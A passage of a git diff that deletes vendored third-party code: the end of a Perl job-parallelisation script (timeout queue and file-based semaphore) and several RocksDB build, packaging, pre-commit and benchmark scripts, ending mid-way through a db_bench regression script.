-		@hostgroups = (keys %Global::hostgroups);
-	    }
-        } else {
-	    @hostgroups = (keys %Global::hostgroups);
-	}
-    }
-    return bless {
-	'orig' => $orig,
-	'hostgroups' => \@hostgroups,
-    }, ref($class) || $class;
-}
-
-sub replace {
-    # Calculates the corresponding value for a given perl expression
-    # Returns:
-    #   The calculated string (quoted if asked for)
-    my $self = shift;
-    my $perlexpr = shift; # E.g. $_=$_ or s/.gz//
-    my $quote = (shift) ? 1 : 0; # should the string be quoted?
-    # This is actually a CommandLine-object,
-    # but it looks nice to be able to say {= $job->slot() =}
-    my $job = shift;
-    $perlexpr =~ s/^-?\d+ //; # Positional replace treated as normal replace
-    if(not defined $self->{"rpl",0,$perlexpr}) {
-	local $_;
-	if($Global::trim eq "n") {
-	    $_ = $self->{'orig'};
-	} else {
-	    $_ = trim_of($self->{'orig'});
-	}
-	::debug("replace", "eval ", $perlexpr, " ", $_, "\n");
-	if(not $Global::perleval{$perlexpr}) {
-	    # Make an anonymous function of the $perlexpr
-	    # And more importantly: Compile it only once
-	    if($Global::perleval{$perlexpr} =
-	       eval('sub { no strict; no warnings; my $job = shift; '.
-		    $perlexpr.' }')) {
-		# All is good
-	    } else {
-		# The eval failed. Maybe $perlexpr is invalid perl?
-		::error("Cannot use $perlexpr: $@\n");
-		::wait_and_exit(255);
-	    }
-	}
-	# Execute the function
-	$Global::perleval{$perlexpr}->($job);
-	$self->{"rpl",0,$perlexpr} = $_;
-    }
-    if(not defined $self->{"rpl",$quote,$perlexpr}) {
-	$self->{"rpl",1,$perlexpr} =
-	    ::shell_quote_scalar($self->{"rpl",0,$perlexpr});
-    }
-    return $self->{"rpl",$quote,$perlexpr};
-}
-
-sub orig {
-    my $self = shift;
-    return $self->{'orig'};
-}
-
-sub trim_of {
-    # Removes white space as specifed by --trim:
-    # n = nothing
-    # l = start
-    # r = end
-    # lr|rl = both
-    # Returns:
-    #   string with white space removed as needed
-    my @strings = map { defined $_ ? $_ : "" } (@_);
-    my $arg;
-    if($Global::trim eq "n") {
-	# skip
-    } elsif($Global::trim eq "l") {
-	for my $arg (@strings) { $arg =~ s/^\s+//; }
-    } elsif($Global::trim eq "r") {
-	for my $arg (@strings) { $arg =~ s/\s+$//; }
-    } elsif($Global::trim eq "rl" or $Global::trim eq "lr") {
-	for my $arg (@strings) { $arg =~ s/^\s+//; $arg =~ s/\s+$//; }
-    } else {
-	::error("--trim must be one of: r l rl lr.\n");
-	::wait_and_exit(255);
-    }
-    return wantarray ? @strings : "@strings";
-}
-
-
-package TimeoutQueue;
-
-sub new {
-    my $class = shift;
-    my $delta_time = shift;
-    my ($pct);
-    if($delta_time =~ /(\d+(\.\d+)?)%/) {
-	# Timeout in percent
-	$pct = $1/100;
-	$delta_time = 1_000_000;
-    }
-    return bless {
-	'queue' => [],
-	'delta_time' => $delta_time,
-	'pct' => $pct,
-	'remedian_idx' => 0,
-	'remedian_arr' => [],
-	'remedian' => undef,
-    }, ref($class) || $class;
-}
-
-sub delta_time {
-    my $self = shift;
-    return $self->{'delta_time'};
-}
-
-sub set_delta_time {
-    my $self = shift;
-    $self->{'delta_time'} = shift;
-}
-
-sub remedian {
-    my $self = shift;
-    return $self->{'remedian'};
-}
-
-sub set_remedian {
-    # Set median of the last 999^3 (=997002999) values using Remedian
-    #
-    # Rousseeuw, Peter J., and Gilbert W. Bassett Jr. "The remedian: A
-    # robust averaging method for large data sets." Journal of the
-    # American Statistical Association 85.409 (1990): 97-104.
-    my $self = shift;
-    my $val = shift;
-    my $i = $self->{'remedian_idx'}++;
-    my $rref = $self->{'remedian_arr'};
-    $rref->[0][$i%999] = $val;
-    $rref->[1][$i/999%999] = (sort @{$rref->[0]})[$#{$rref->[0]}/2];
-    $rref->[2][$i/999/999%999] = (sort @{$rref->[1]})[$#{$rref->[1]}/2];
-    $self->{'remedian'} = (sort @{$rref->[2]})[$#{$rref->[2]}/2];
-}
-
-sub update_delta_time {
-    # Update delta_time based on runtime of finished job if timeout is
-    # a percentage
-    my $self = shift;
-    my $runtime = shift;
-    if($self->{'pct'}) {
-	$self->set_remedian($runtime);
-	$self->{'delta_time'} = $self->{'pct'} * $self->remedian();
-	::debug("run", "Timeout: $self->{'delta_time'}s ");
-    }
-}
-
-sub process_timeouts {
-    # Check if there was a timeout
-    my $self = shift;
-    # $self->{'queue'} is sorted by start time
-    while (@{$self->{'queue'}}) {
-	my $job = $self->{'queue'}[0];
-	if($job->endtime()) {
-	    # Job already finished. No need to timeout the job
-	    # This could be because of --keep-order
-	    shift @{$self->{'queue'}};
-	} elsif($job->timedout($self->{'delta_time'})) {
-	    # Need to shift off queue before kill
-	    # because kill calls usleep that calls process_timeouts
-	    shift @{$self->{'queue'}};
-	    $job->kill();
-	} else {
-	    # Because they are sorted by start time the rest are later
-	    last;
-	}
-    }
-}
-
-sub insert {
-    my $self = shift;
-    my $in = shift;
-    push @{$self->{'queue'}}, $in;
-}
-
-
-package Semaphore;
-
-# This package provides a counting semaphore
-#
-# If a process dies without releasing the semaphore the next process
-# that needs that entry will clean up dead semaphores
-#
-# The semaphores are stored in ~/.parallel/semaphores/id-<name> Each
-# file in ~/.parallel/semaphores/id-<name>/ is the process ID of the
-# process holding the entry. If the process dies, the entry can be
-# taken by another process.
-
-sub new {
-    my $class = shift;
-    my $id = shift;
-    my $count = shift;
-    $id=~s/([^-_a-z0-9])/unpack("H*",$1)/ige; # Convert non-word chars to hex
-    $id="id-".$id; # To distinguish it from a process id
-    my $parallel_dir = $ENV{'HOME'}."/.parallel";
-    -d $parallel_dir or mkdir_or_die($parallel_dir);
-    my $parallel_locks = $parallel_dir."/semaphores";
-    -d $parallel_locks or mkdir_or_die($parallel_locks);
-    my $lockdir = "$parallel_locks/$id";
-    my $lockfile = $lockdir.".lock";
-    if($count < 1) { ::die_bug("semaphore-count: $count"); }
-    return bless {
-	'lockfile' => $lockfile,
-	'lockfh' => Symbol::gensym(),
-	'lockdir' => $lockdir,
-	'id' => $id,
-	'idfile' => $lockdir."/".$id,
-	'pid' => $$,
-	'pidfile' => $lockdir."/".$$.'@'.::hostname(),
-	'count' => $count + 1 # nlinks returns a link for the 'id-' as well
-    }, ref($class) || $class;
-}
-
-sub acquire {
-    my $self = shift;
-    my $sleep = 1; # 1 ms
-    my $start_time = time;
-    while(1) {
-	$self->atomic_link_if_count_less_than() and last;
-	::debug("sem", "Remove dead locks");
-	my $lockdir = $self->{'lockdir'};
-	for my $d (glob "$lockdir/*") {
-	    ::debug("sem", "Lock $d $lockdir\n");
-	    $d =~ m:$lockdir/([0-9]+)\@([-\._a-z0-9]+)$:o or next;
-	    my ($pid, $host) = ($1, $2);
-	    if($host eq ::hostname()) {
-		if(not kill 0, $1) {
-		    ::debug("sem", "Dead: $d");
-		    unlink $d;
-		} else {
-		    ::debug("sem", "Alive: $d");
-		}
-	    }
-	}
-	# try again
-	$self->atomic_link_if_count_less_than() and last;
-	# Retry slower and slower up to 1 second
-	$sleep = ($sleep < 1000) ? ($sleep * 1.1) : ($sleep);
-	# Random to avoid every sleeping job waking up at the same time
-	::usleep(rand()*$sleep);
-	if(defined($opt::timeout) and
-	   $start_time + $opt::timeout > time) {
-	    # Acquire the lock anyway
-	    if(not -e $self->{'idfile'}) {
-		open (my $fh, ">", $self->{'idfile'}) or
-		    ::die_bug("timeout_write_idfile: $self->{'idfile'}");
-		close $fh;
-	    }
-	    link $self->{'idfile'}, $self->{'pidfile'};
-	    last;
-	}
-    }
-    ::debug("sem", "acquired $self->{'pid'}\n");
-}
-
-sub release {
-    my $self = shift;
-    unlink $self->{'pidfile'};
-    if($self->nlinks() == 1) {
-	# This is the last link, so atomic cleanup
-	$self->lock();
-	if($self->nlinks() == 1) {
-	    unlink $self->{'idfile'};
-	    rmdir $self->{'lockdir'};
-	}
-	$self->unlock();
-    }
-    ::debug("run", "released $self->{'pid'}\n");
-}
-
-sub _release {
-    my $self = shift;
-
-    unlink $self->{'pidfile'};
-    $self->lock();
-    my $nlinks = $self->nlinks();
-    ::debug("sem", $nlinks, "<", $self->{'count'});
-    if($nlinks-- > 1) {
-       unlink $self->{'idfile'};
-       open (my $fh, ">", $self->{'idfile'}) or
-           ::die_bug("write_idfile: $self->{'idfile'}");
-       print $fh "#"x$nlinks;
-       close $fh;
-    } else {
-       unlink $self->{'idfile'};
-       rmdir $self->{'lockdir'};
-    }
-    $self->unlock();
-    ::debug("sem", "released $self->{'pid'}\n");
-}
-
-sub atomic_link_if_count_less_than {
-    # Link $file1 to $file2 if nlinks to $file1 < $count
-    my $self = shift;
-    my $retval = 0;
-    $self->lock();
-    ::debug($self->nlinks(), "<", $self->{'count'});
-    if($self->nlinks() < $self->{'count'}) {
-	-d $self->{'lockdir'} or mkdir_or_die($self->{'lockdir'});
-	if(not -e $self->{'idfile'}) {
-	    open (my $fh, ">", $self->{'idfile'}) or
-		::die_bug("write_idfile: $self->{'idfile'}");
-	    close $fh;
-	}
-	$retval = link $self->{'idfile'}, $self->{'pidfile'};
-    }
-    $self->unlock();
-    ::debug("run", "atomic $retval");
-    return $retval;
-}
-
-sub _atomic_link_if_count_less_than {
-    # Link $file1 to $file2 if nlinks to $file1 < $count
-    my $self = shift;
-    my $retval = 0;
-    $self->lock();
-    my $nlinks = $self->nlinks();
-    ::debug("sem", $nlinks, "<", $self->{'count'});
-    if($nlinks++ < $self->{'count'}) {
-	-d $self->{'lockdir'} or mkdir_or_die($self->{'lockdir'});
-	if(not -e $self->{'idfile'}) {
-	    open (my $fh, ">", $self->{'idfile'}) or
-		::die_bug("write_idfile: $self->{'idfile'}");
-	    close $fh;
-	}
-	open (my $fh, ">", $self->{'idfile'}) or
-	    ::die_bug("write_idfile: $self->{'idfile'}");
-	print $fh "#"x$nlinks;
-	close $fh;
-	$retval = link $self->{'idfile'}, $self->{'pidfile'};
-    }
-    $self->unlock();
-    ::debug("sem", "atomic $retval");
-    return $retval;
-}
-
-sub nlinks {
-    my $self = shift;
-    if(-e $self->{'idfile'}) {
-	::debug("sem", "nlinks", (stat(_))[3], "size", (stat(_))[7], "\n");
-	return (stat(_))[3];
-    } else {
-	return 0;
-    }
-}
-
-sub lock {
-    my $self = shift;
-    my $sleep = 100; # 100 ms
-    my $total_sleep = 0;
-    $Global::use{"Fcntl"} ||= eval "use Fcntl qw(:DEFAULT :flock); 1;";
-    my $locked = 0;
-    while(not $locked) {
-	if(tell($self->{'lockfh'}) == -1) {
-	    # File not open
-	    open($self->{'lockfh'}, ">", $self->{'lockfile'})
-		or ::debug("run", "Cannot open $self->{'lockfile'}");
-	}
-	if($self->{'lockfh'}) {
-	    # File is open
-	    chmod 0666, $self->{'lockfile'}; # assuming you want it a+rw
-	    if(flock($self->{'lockfh'}, LOCK_EX()|LOCK_NB())) {
-		# The file is locked: No need to retry
-		$locked = 1;
-		last;
-	    } else {
-		if ($! =~ m/Function not implemented/) {
-		    ::warning("flock: $!");
-		    ::warning("Will wait for a random while\n");
-		    ::usleep(rand(5000));
-		    # File cannot be locked: No need to retry
-		    $locked = 2;
-		    last;
-		}
-	    }
-	}
-	# Locking failed in first round
-	# Sleep and try again
-	$sleep = ($sleep < 1000) ? ($sleep * 1.1) : ($sleep);
-	# Random to avoid every sleeping job waking up at the same time
-	::usleep(rand()*$sleep);
-	$total_sleep += $sleep;
-	if($opt::semaphoretimeout) {
-	    if($total_sleep/1000 > $opt::semaphoretimeout) {
-		# Timeout: bail out
-		::warning("Semaphore timed out. Ignoring timeout.");
-		$locked = 3;
-		last;
-	    }
-	} else {
-	    if($total_sleep/1000 > 30) {
-		::warning("Semaphore stuck for 30 seconds. Consider using --semaphoretimeout.");
-	    }
-	}
-    }
-    ::debug("run", "locked $self->{'lockfile'}");
-}
-
-sub unlock {
-    my $self = shift;
-    unlink $self->{'lockfile'};
-    close $self->{'lockfh'};
-    ::debug("run", "unlocked\n");
-}
-
-sub mkdir_or_die {
-    # If dir is not writable: die
-    my $dir = shift;
-    my @dir_parts = split(m:/:,$dir);
-    my ($ddir,$part);
-    while(defined ($part = shift @dir_parts)) {
-	$part eq "" and next;
-	$ddir .= "/".$part;
-	-d $ddir and next;
-	mkdir $ddir;
-    }
-    if(not -w $dir) {
-	::error("Cannot write to $dir: $!\n");
-	::wait_and_exit(255);
-    }
-}
-
-# Keep perl -w happy
-$opt::x = $Semaphore::timeout = $Semaphore::wait =
-$Job::file_descriptor_warning_printed = 0;
diff --git a/thirdparty/rocksdb/build_tools/make_package.sh b/thirdparty/rocksdb/build_tools/make_package.sh
deleted file mode 100755
index 58bac44..0000000
--- a/thirdparty/rocksdb/build_tools/make_package.sh
+++ /dev/null
@@ -1,128 +0,0 @@
-#/usr/bin/env bash
-
-set -e
-
-function log() {
-  echo "[+] $1"
-}
-
-function fatal() {
-  echo "[!] $1"
-  exit 1
-}
-
-function platform() {
-  local  __resultvar=$1
-  if [[ -f "/etc/yum.conf" ]]; then
-    eval $__resultvar="centos"
-  elif [[ -f "/etc/dpkg/dpkg.cfg" ]]; then
-    eval $__resultvar="ubuntu"
-  else
-    fatal "Unknwon operating system"
-  fi
-}
-platform OS
-
-function package() {
-  if [[ $OS = "ubuntu" ]]; then
-    if dpkg --get-selections | grep --quiet $1; then
-      log "$1 is already installed. skipping."
-    else
-      apt-get install $@ -y
-    fi
-  elif [[ $OS = "centos" ]]; then
-    if rpm -qa | grep --quiet $1; then
-      log "$1 is already installed. skipping."
-    else
-      yum install $@ -y
-    fi
-  fi
-}
-
-function detect_fpm_output() {
-  if [[ $OS = "ubuntu" ]]; then
-    export FPM_OUTPUT=deb
-  elif [[ $OS = "centos" ]]; then
-    export FPM_OUTPUT=rpm
-  fi
-}
-detect_fpm_output
-
-function gem_install() {
-  if gem list | grep --quiet $1; then
-    log "$1 is already installed. skipping."
-  else
-    gem install $@
-  fi
-}
-
-function main() {
-  if [[ $# -ne 1 ]]; then
-    fatal "Usage: $0 <rocksdb_version>"
-  else
-    log "using rocksdb version: $1"
-  fi
-
-  if [[ -d /vagrant ]]; then
-    if [[ $OS = "ubuntu" ]]; then
-      package g++-4.8
-      export CXX=g++-4.8
-
-      # the deb would depend on libgflags2, but the static lib is the only thing
-      # installed by make install
-      package libgflags-dev
-
-      package ruby-all-dev
-    elif [[ $OS = "centos" ]]; then
-      pushd /etc/yum.repos.d
-      if [[ ! -f /etc/yum.repos.d/devtools-1.1.repo ]]; then
-        wget http://people.centos.org/tru/devtools-1.1/devtools-1.1.repo
-      fi
-      package devtoolset-1.1-gcc --enablerepo=testing-1.1-devtools-6
-      package devtoolset-1.1-gcc-c++ --enablerepo=testing-1.1-devtools-6
-      export CC=/opt/centos/devtoolset-1.1/root/usr/bin/gcc
-      export CPP=/opt/centos/devtoolset-1.1/root/usr/bin/cpp
-      export CXX=/opt/centos/devtoolset-1.1/root/usr/bin/c++
-      export PATH=$PATH:/opt/centos/devtoolset-1.1/root/usr/bin
-      popd
-      if ! rpm -qa | grep --quiet gflags; then
-        rpm -i https://github.com/schuhschuh/gflags/releases/download/v2.1.0/gflags-devel-2.1.0-1.amd64.rpm
-      fi
-
-      package ruby
-      package ruby-devel
-      package rubygems
-      package rpm-build
-    fi
-  fi
-  gem_install fpm
-
-  make static_lib
-  make install INSTALL_PATH=package
-
-  cd package
-
-  LIB_DIR=lib
-  if [[ -z "$ARCH" ]]; then
-      ARCH=$(getconf LONG_BIT)
-  fi
-  if [[ ("$FPM_OUTPUT" = "rpm") && ($ARCH -eq 64) ]]; then
-      mv lib lib64
-      LIB_DIR=lib64
-  fi
-
-  fpm \
-    -s dir \
-    -t $FPM_OUTPUT \
-    -n rocksdb \
-    -v $1 \
-    --prefix /usr \
-    --url http://rocksdb.org/ \
-    -m rocksdb@fb.com \
-    --license BSD \
-    --vendor Facebook \
-    --description "RocksDB is an embeddable persistent key-value store for fast storage." \
-    include $LIB_DIR
-}
-
-main $@
diff --git a/thirdparty/rocksdb/build_tools/precommit_checker.py b/thirdparty/rocksdb/build_tools/precommit_checker.py
deleted file mode 100755
index 0f8884d..0000000
--- a/thirdparty/rocksdb/build_tools/precommit_checker.py
+++ /dev/null
@@ -1,208 +0,0 @@
-#!/usr/local/fbcode/gcc-4.9-glibc-2.20-fb/bin/python2.7
-
-from __future__ import absolute_import
-from __future__ import division
-from __future__ import print_function
-from __future__ import unicode_literals
-import argparse
-import commands
-import subprocess
-import sys
-import re
-import os
-import time
-
-
-#
-# Simple logger
-#
-
-class Log:
-
-    def __init__(self, filename):
-        self.filename = filename
-        self.f = open(self.filename, 'w+', 0)
-
-    def caption(self, str):
-        line = "\n##### %s #####\n" % str
-        if self.f:
-            self.f.write("%s \n" % line)
-        else:
-            print(line)
-
-    def error(self, str):
-        data = "\n\n##### ERROR ##### %s" % str
-        if self.f:
-            self.f.write("%s \n" % data)
-        else:
-            print(data)
-
-    def log(self, str):
-        if self.f:
-            self.f.write("%s \n" % str)
-        else:
-            print(str)
-
-#
-# Shell Environment
-#
-
-
-class Env(object):
-
-    def __init__(self, logfile, tests):
-        self.tests = tests
-        self.log = Log(logfile)
-
-    def shell(self, cmd, path=os.getcwd()):
-        if path:
-            os.chdir(path)
-
-        self.log.log("==== shell session ===========================")
-        self.log.log("%s> %s" % (path, cmd))
-        status = subprocess.call("cd %s; %s" % (path, cmd), shell=True,
-                                 stdout=self.log.f, stderr=self.log.f)
-        self.log.log("status = %s" % status)
-        self.log.log("============================================== \n\n")
-        return status
-
-    def GetOutput(self, cmd, path=os.getcwd()):
-        if path:
-            os.chdir(path)
-
-        self.log.log("==== shell session ===========================")
-        self.log.log("%s> %s" % (path, cmd))
-        status, out = commands.getstatusoutput(cmd)
-        self.log.log("status = %s" % status)
-        self.log.log("out = %s" % out)
-        self.log.log("============================================== \n\n")
-        return status, out
-
-#
-# Pre-commit checker
-#
-
-
-class PreCommitChecker(Env):
-
-    def __init__(self, args):
-        Env.__init__(self, args.logfile, args.tests)
-        self.ignore_failure = args.ignore_failure
-
-    #
-    #   Get commands for a given job from the determinator file
-    #
-    def get_commands(self, test):
-        status, out = self.GetOutput(
-            "RATIO=1 build_tools/rocksdb-lego-determinator %s" % test, ".")
-        return status, out
-
-    #
-    # Run a specific CI job
-    #
-    def run_test(self, test):
-        self.log.caption("Running test %s locally" % test)
-
-        # get commands for the CI job determinator
-        status, cmds = self.get_commands(test)
-        if status != 0:
-            self.log.error("Error getting commands for test %s" % test)
-            return False
-
-        # Parse the JSON to extract the commands to run
-        cmds = re.findall("'shell':'([^\']*)'", cmds)
-
-        if len(cmds) == 0:
-            self.log.log("No commands found")
-            return False
-
-        # Run commands
-        for cmd in cmds:
-            # Replace J=<..> with the local environment variable
-            if "J" in os.environ:
-                cmd = cmd.replace("J=1", "J=%s" % os.environ["J"])
-                cmd = cmd.replace("make ", "make -j%s " % os.environ["J"])
-            # Run the command
-            status = self.shell(cmd, ".")
-            if status != 0:
-                self.log.error("Error running command %s for test %s"
-                               % (cmd, test))
-                return False
-
-        return True
-
-    #
-    # Run specified CI jobs
-    #
-    def run_tests(self):
-        if not self.tests:
-            self.log.error("Invalid args. Please provide tests")
-            return False
-
-        self.print_separator()
-        self.print_row("TEST", "RESULT")
-        self.print_separator()
-
-        result = True
-        for test in self.tests:
-            start_time = time.time()
-            self.print_test(test)
-            result = self.run_test(test)
-            elapsed_min = (time.time() - start_time) / 60
-            if not result:
-                self.log.error("Error running test %s" % test)
-                self.print_result("FAIL (%dm)" % elapsed_min)
-                if not self.ignore_failure:
-                    return False
-                result = False
-            else:
-                self.print_result("PASS (%dm)" % elapsed_min)
-
-        self.print_separator()
-        return result
-
-    #
-    # Print a line
-    #
-    def print_separator(self):
-        print("".ljust(60, "-"))
-
-    #
-    # Print two colums
-    #
-    def print_row(self, c0, c1):
-        print("%s%s" % (c0.ljust(40), c1.ljust(20)))
-
-    def print_test(self, test):
-        print(test.ljust(40), end="")
-        sys.stdout.flush()
-
-    def print_result(self, result):
-        print(result.ljust(20))
-
-#
-# Main
-#
-parser = argparse.ArgumentParser(description='RocksDB pre-commit checker.')
-
-# --log <logfile>
-parser.add_argument('--logfile', default='/tmp/precommit-check.log',
-                    help='Log file. Default is /tmp/precommit-check.log')
-# --ignore_failure
-parser.add_argument('--ignore_failure', action='store_true', default=False,
-                    help='Stop when an error occurs')
-# <test ....>
-parser.add_argument('tests', nargs='+',
-                    help='CI test(s) to run. e.g: unit punit asan tsan ubsan')
-
-args = parser.parse_args()
-checker = PreCommitChecker(args)
-
-print("Please follow log %s" % checker.log.filename)
-
-if not checker.run_tests():
-    print("Error running tests. Please check log file %s"
-          % checker.log.filename)
-    sys.exit(1)
-
-sys.exit(0)
diff --git a/thirdparty/rocksdb/build_tools/regression_build_test.sh b/thirdparty/rocksdb/build_tools/regression_build_test.sh
deleted file mode 100755
index 6980633..0000000
--- a/thirdparty/rocksdb/build_tools/regression_build_test.sh
+++ /dev/null
@@ -1,413 +0,0 @@
-#!/usr/bin/env bash
-
-set -e
-
-NUM=10000000
-
-if [ $# -eq 1 ];then
-  DATA_DIR=$1
-elif [ $# -eq 2 ];then
-  DATA_DIR=$1
-  STAT_FILE=$2
-fi
-
-# On the production build servers, set data and stat
-# files/directories not in /tmp or else the tempdir cleaning
-# scripts will make you very unhappy.
-DATA_DIR=${DATA_DIR:-$(mktemp -t -d rocksdb_XXXX)}
-STAT_FILE=${STAT_FILE:-$(mktemp -t -u rocksdb_test_stats_XXXX)}
-
-function cleanup {
-  rm -rf $DATA_DIR
-  rm -f $STAT_FILE.fillseq
-  rm -f $STAT_FILE.readrandom
-  rm -f $STAT_FILE.overwrite
-  rm -f $STAT_FILE.memtablefillreadrandom
-}
-
-trap cleanup EXIT
-
-if [ -z $GIT_BRANCH ]; then
-  git_br=`git rev-parse --abbrev-ref HEAD`
-else
-  git_br=$(basename $GIT_BRANCH)
-fi
-
-if [ $git_br == "master" ]; then
-  git_br=""
-else
-  git_br="."$git_br
-fi
-
-make release
-
-# measure fillseq + fill up the DB for overwrite benchmark
-./db_bench \
-    --benchmarks=fillseq \
-    --db=$DATA_DIR \
-    --use_existing_db=0 \
-    --bloom_bits=10 \
-    --num=$NUM \
-    --writes=$NUM \
-    --cache_size=6442450944 \
-    --cache_numshardbits=6 \
-    --table_cache_numshardbits=4 \
-    --open_files=55000 \
-    --statistics=1 \
-    --histogram=1 \
-    --disable_wal=1 \
-    --sync=0  > ${STAT_FILE}.fillseq
-
-# measure overwrite performance
-./db_bench \
-    --benchmarks=overwrite \
-    --db=$DATA_DIR \
-    --use_existing_db=1 \
-    --bloom_bits=10 \
-    --num=$NUM \
-    --writes=$((NUM / 10)) \
-    --cache_size=6442450944 \
-    --cache_numshardbits=6  \
-    --table_cache_numshardbits=4 \
-    --open_files=55000 \
-    --statistics=1 \
-    --histogram=1 \
-    --disable_wal=1 \
-    --sync=0 \
-    --threads=8 > ${STAT_FILE}.overwrite
-
-# fill up the db for readrandom benchmark (1GB total size)
-./db_bench \
-    --benchmarks=fillseq \
-    --db=$DATA_DIR \
-    --use_existing_db=0 \
-    --bloom_bits=10 \
-    --num=$NUM \
-    --writes=$NUM \
-    --cache_size=6442450944 \
-    --cache_numshardbits=6 \
-    --table_cache_numshardbits=4 \
-    --open_files=55000 \
-    --statistics=1 \
-    --histogram=1 \
-    --disable_wal=1 \
-    --sync=0 \
-    --threads=1 > /dev/null
-
-# measure readrandom with 6GB block cache
-./db_bench \
-    --benchmarks=readrandom \
-    --db=$DATA_DIR \
-    --use_existing_db=1 \
-    --bloom_bits=10 \
-    --num=$NUM \
-    --reads=$((NUM / 5)) \
-    --cache_size=6442450944 \
-    --cache_numshardbits=6 \
-    --table_cache_numshardbits=4 \
-    --open_files=55000 \
-    --statistics=1 \
-    --histogram=1 \
-    --disable_wal=1 \
-    --sync=0 \
-    --threads=16 > ${STAT_FILE}.readrandom
-
-# measure readrandom with 6GB block cache and tailing iterator
-./db_bench \
-    --benchmarks=readrandom \
-    --db=$DATA_DIR \
-    --use_existing_db=1 \
-    --bloom_bits=10 \
-    --num=$NUM \
-    --reads=$((NUM / 5)) \
-    --cache_size=6442450944 \
-    --cache_numshardbits=6 \
-    --table_cache_numshardbits=4 \
-    --open_files=55000 \
-    --use_tailing_iterator=1 \
-    --statistics=1 \
-    --histogram=1 \
-    --disable_wal=1 \
-    --sync=0 \
-    --threads=16 > ${STAT_FILE}.readrandomtailing
-
-# measure readrandom with 100MB block cache
-./db_bench \
-    --benchmarks=readrandom \
-    --db=$DATA_DIR \
-    --use_existing_db=1 \
-    --bloom_bits=10 \
-    --num=$NUM \
-    --reads=$((NUM / 5)) \
-    --cache_size=104857600 \
-    --cache_numshardbits=6 \
-    --table_cache_numshardbits=4 \
-    --open_files=55000 \
-    --statistics=1 \
-    --histogram=1 \
-    --disable_wal=1 \
-    --sync=0 \
-    --threads=16 > ${STAT_FILE}.readrandomsmallblockcache
-
-# measure readrandom with 8k data in memtable
-./db_bench \
-    --benchmarks=overwrite,readrandom \
-    --db=$DATA_DIR \
-    --use_existing_db=1 \
-    --bloom_bits=10 \
-    --num=$NUM \
-    --reads=$((NUM / 5)) \
-    --writes=512 \
-    --cache_size=6442450944 \
-    --cache_numshardbits=6 \
-    --table_cache_numshardbits=4 \
-    --write_buffer_size=1000000000 \
-    --open_files=55000 \
-    --statistics=1 \
-    --histogram=1 \
-    --disable_wal=1 \
-    --sync=0 \
-    --threads=16 > ${STAT_FILE}.readrandom_mem_sst
-
-
-# fill up the db for readrandom benchmark with filluniquerandom (1GB total size)
-./db_bench \
-    --benchmarks=filluniquerandom \
-    --db=$DATA_DIR \
-    --use_existing_db=0 \
-    --bloom_bits=10 \
-    --num=$((NUM / 4)) \
-    --writes=$((NUM / 4)) \
-    --cache_size=6442450944 \
-    --cache_numshardbits=6 \
-    --table_cache_numshardbits=4 \
-    --open_files=55000 \
-    --statistics=1 \
-    --histogram=1 \
-    --disable_wal=1 \
-    --sync=0 \
-    --threads=1 > /dev/null
-
-# dummy test just to compact the data
-./db_bench \
-    --benchmarks=readrandom \
-    --db=$DATA_DIR \
-    --use_existing_db=1 \
-    --bloom_bits=10 \
-    --num=$((NUM / 1000)) \
-    --reads=$((NUM / 1000)) \
-    --cache_size=6442450944 \
-    --cache_numshardbits=6 \
-    --table_cache_numshardbits=4 \
-    --open_files=55000 \
-    --statistics=1 \
-    --histogram=1 \
-    --disable_wal=1 \
-    --sync=0 \
-    --threads=16 > /dev/null
-
-# measure readrandom after load with filluniquerandom with 6GB block cache
-./db_bench \
-    --benchmarks=readrandom \
-    --db=$DATA_DIR \
-    --use_existing_db=1 \
-    --bloom_bits=10 \
-    --num=$((NUM / 4)) \
-    --reads=$((NUM / 4)) \
-    --cache_size=6442450944 \
-    --cache_numshardbits=6 \
-    --table_cache_numshardbits=4 \
-    --open_files=55000 \
-    --disable_auto_compactions=1 \
-    --statistics=1 \
-    --histogram=1 \
-    --disable_wal=1 \
-    --sync=0 \
-    --threads=16 > ${STAT_FILE}.readrandom_filluniquerandom
-
-# measure readwhilewriting after load with filluniquerandom with 6GB block cache
-./db_bench \
-    --benchmarks=readwhilewriting \
-    --db=$DATA_DIR \
-    --use_existing_db=1 \
-    --bloom_bits=10 \
-    --num=$((NUM / 4)) \
-    --reads=$((NUM / 4)) \
-    --benchmark_write_rate_limit=$(( 110 * 1024 )) \
-    --write_buffer_size=100000000 \
-    --cache_size=6442450944 \
-    --cache_numshardbits=6 \
-    --table_cache_numshardbits=4 \
-    --open_files=55000 \
-    --statistics=1 \
-    --histogram=1 \
-    --disable_wal=1 \
-    --sync=0 \
-    --threads=16 > ${STAT_FILE}.readwhilewriting
-
-# measure memtable performance -- none of the data gets flushed to disk
-./db_bench \
-    --benchmarks=fillrandom,readrandom, \
-    --db=$DATA_DIR \
-    --use_existing_db=0 \
-    --num=$((NUM / 10)) \
-    --reads=$NUM \
-    --cache_size=6442450944 \
-    --cache_numshardbits=6 \
-    --table_cache_numshardbits=4 \
-    --write_buffer_size=1000000000 \
-    --open_files=55000 \
-    --statistics=1 \
-    --histogram=1 \
-    --disable_wal=1 \
-    --sync=0 \
-    --value_size=10 \
-    --threads=16 > ${STAT_FILE}.memtablefillreadrandom
-
-common_in_mem_args="--db=/dev/shm/rocksdb \
-    --num_levels=6 \
-    --key_size=20 \
-    --prefix_size=12 \
-    --keys_per_prefix=10 \
-    --value_size=100 \
-    --compression_type=none \
-    --compression_ratio=1 \
-    --hard_rate_limit=2 \
-    --write_buffer_size=134217728 \
-    --max_write_buffer_number=4 \
-    --level0_file_num_compaction_trigger=8 \
-    --level0_slowdown_writes_trigger=16 \
-    --level0_stop_writes_trigger=24 \
-    --target_file_size_base=134217728 \
-    --max_bytes_for_level_base=1073741824 \
-    --disable_wal=0 \
-    --wal_dir=/dev/shm/rocksdb \
-    --sync=0 \
-    --verify_checksum=1 \
-    --delete_obsolete_files_period_micros=314572800 \
-    --max_grandparent_overlap_factor=10 \
-    --use_plain_table=1 \
-    --open_files=-1 \
-    --mmap_read=1 \
-    --mmap_write=0 \
-    --memtablerep=prefix_hash \
-    --bloom_bits=10 \
-    --bloom_locality=1 \
-    --perf_level=0"
-
-# prepare a in-memory DB with 50M keys, total DB size is ~6G
-./db_bench \
-    $common_in_mem_args \
-    --statistics=0 \
-    --max_background_compactions=16 \
-    --max_background_flushes=16 \
-    --benchmarks=filluniquerandom \
-    --use_existing_db=0 \
-    --num=52428800 \
-    --threads=1 > /dev/null
-
-# Readwhilewriting
-./db_bench \
-    $common_in_mem_args \
-    --statistics=1 \
-    --max_background_compactions=4 \
-    --max_background_flushes=0 \
-    --benchmarks=readwhilewriting\
-    --use_existing_db=1 \
-    --duration=600 \
-    --threads=32 \
